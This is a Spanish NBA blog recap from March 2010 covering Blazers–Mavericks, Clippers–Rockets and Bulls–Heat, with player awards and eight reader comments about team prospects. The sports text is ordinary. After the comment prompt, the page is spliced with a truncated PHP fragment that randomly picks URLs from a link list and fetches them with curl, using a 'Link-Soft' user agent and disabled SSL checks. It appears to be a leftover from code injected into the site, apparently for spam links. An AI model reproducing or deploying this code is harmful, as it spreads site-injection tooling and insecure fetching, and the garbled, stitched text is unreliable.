La Crónica (25/03/2010)

26 de March de 2010 por TheDeerHunter

El Oeste se comprime. Con la mala racha de Denver se solidariza Dallas. Triple empate en el 2º puesto del Oeste con Utah, que se destapan como los más en forma de los tres. El camino queda despejado para Lakers en su búsqueda de la ventaja campo por su parte del cuadro.

Los Mavs sucumbieron al Rose Garden de Portland. Con Camby, los Blazers vuelven a destaparse como un rival a tener en cuenta y apenas 4 partidos les separa de la segunda posición. Dallas no pudo aprovechar el mejor partido de Caron Butler desde que llegó al equipo. Fracasaron Nowitzki, Kidd, Marion, Terry y, por supuesto, Dampier. La defensa, un coladero y ya empieza a resultar preocupante a las puertas de la postemporada. Por los locales muy partido impecable de Aldridge y Camby por dentro y Roy y André Miller por fuera.

Por su parte, los Clippers dieron la campanada en el Toyota Center de Houston con un impresionante partido de Craigh Smith. Ya es ilustrativo que el equipo pobre de L.A. no hubiera ganado como visitante desde ni se sabe.  Los Rockets inevitablemente aguardan a la lotería.

Finalmente los Bulls profanaron el legendario United Center con su juego indigno. 49 puntos en 3 cuartos, toda una declaración de intenciones para su lucha por los playoffs. Wade no tuvo ni que sudar y Jermaine O’neal y Udonis Haslem se pusieron las botas.

PREMIOS

MVP: Al alimón Lamarcus Aldridge (20 puntos, 10 rebotes y 5 asistencias) y su compañero André Miller (19 puntos, 10 asistencias y 3 robos)

El rookie: Taj Gibson no tuvo su día. Firmó un aceptable 12-10 siendo de lo mejor de su equipo pero fue masacrado sin piedad por los hombres interiores de los Heat.

La sorpresa: Craig Smith 25-10 en 26 minutos de juego. Si hubiera jugado todos los días la mitad de bien que hoy no sería una de las decepciones de los Clippers esta temporada.

La decepción: Los 74 puntos de los Bulls, o la derrota por 30 puntos jugándose la temporada. Como decimos indigno para esa camiseta.

El mayor esfuerzo en vano: El mejor partido en los Mavs de Caron Butler fue ni más ni menos que de 25-9. Una pena que sus compañeros no le acompañaran en el esfuerzo.

Comenta

8 comentarios a esta entrada

  1. Txusma dice:
    #1

    16 minutos de juego, 8 puntos-4 rebotes y un 57% de acierto. Ya ficho yo para mi equipo a este jugador decepcionante…

      Citar

  2. LEmontus dice:
    #2

    Lo de chicago no tiene nombre…. Vaya banda de equipo ¿jannero pargo 8 tiros? ¿Richards 23 minutos? uffff… Además del mal día de rose…. Como siempre warrick imparable en ataque…. Para mi la solución es coger una rotacion fija con rose hinrich jhonson(hasta que deng vuelva) gibson noah como quinteto titular y desde el banco Warrick con bastantes minutos, Law(para mi una sopresa me recuerda a G hill) Murray y Miller con pocos minutos solo para dar decanso a noah. Además tambien deberían jugar a algo y tener claro las opciones de ataque: -Aclarado para rose. -Warrick/Gibson – Tiros abiertos para hinrich …. tras el partido de hoy y la banda que son no se merecen los PO.

    Que bueno es y que clase tiene Albridge y que gran partido de blazers con unos mavs que parece que se relajan en demasía.

      Citar

  3. TheDeerHunter dice:
    #3

    Craig Smith es un jugador que hasta este año estaba en clara progresión. Este año ha bajado minutos y producción por primera vez en su carrera.

    Yo creo que los Clippers esperaban más de él, igual que de DeAndré Jordan, que cuajó un final de la campaña pasada muy interesante.
    Con Kaman y Blake, Camby y estos dos para mí los Clippers tenían un juego interior de nivel (les di playoffs en mis pronósticos, como varios medios especializados) Sin Camby y Blake tiene más delito que estos no hayan progresado como venían haciéndolo.

    Es una de las claves (no la principal, obviamente) de que los Clippers hayan fracasado un año más.

      Citar

  4. kantonyo dice:
    #4

    El gran problema de que los Clippers no esten jugandose los playoffs es la baja de Blake Griffin. No olvidemos que este jugador es el mejor jugador drafteado de los últimos años, al nivel de Roy y Durant. Es un pedazo de jugador y que hemos olvidado por su lesión. Claro favorito para el rookie del año que viene.

      Citar

  5. LEmontus dice:
    #5

    Los clippers se han hecho un buen equipo para el año que viene.Esta temporada con la baja de grffin ha sido un año de transición pero para la próxima Blake/Davis Gordon/Butler Outlaw Griffin/Gooden/Kaman + Craig desde el banco como revulsivo…. Habrá que verlos pero el consigan o no Po dependerá del rendimiento de Blake que tras una lesión de ese calibre me extrañaría que volviese al 100% .

      Citar

  6. kantonyo dice:
    #6

    La verdad que no sé si la lesión es de mucha importancia o es que han preferido aguantar a la próxima temporada viendo que ya no se jugaban nada, que así Griffin podía disputar el ROY’11 y tener más tiempo de recuperación. ¿Alguien sabe algo sobre esto? No llegan muchas noticias sobre este caso.

    Estoy contigo LeMontus que tienen buena pinta si saben hacer las cosas bien. Lo que menos me gusta es el puesto de base, pero ojo, seguro que tambien van a pescar bien en el draft, un top 10 como mínimo.

      Citar

  7. Love Denise dice:
    #7

    para mí lo más importante para los Clippers es que tienen como 20 millones libres para fichar a algún agente libre, si logran convencer a alguién (que creo que no sería dificil tratándose de Los Ángeles) más su elección de draft más lo que tienen ya, el año que viene podrían formar un buen equipo. Claro que viendo cómo se han manejado en los despachos en los últimos años, ya uno se espera lo peor.

      Citar

  8. sergio dice:
    #8

    No esperaba ver a Jason Kidd todavia a este nivel. Creo que tiene la misma valoracion que la que ha tenido de media en su carrera.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>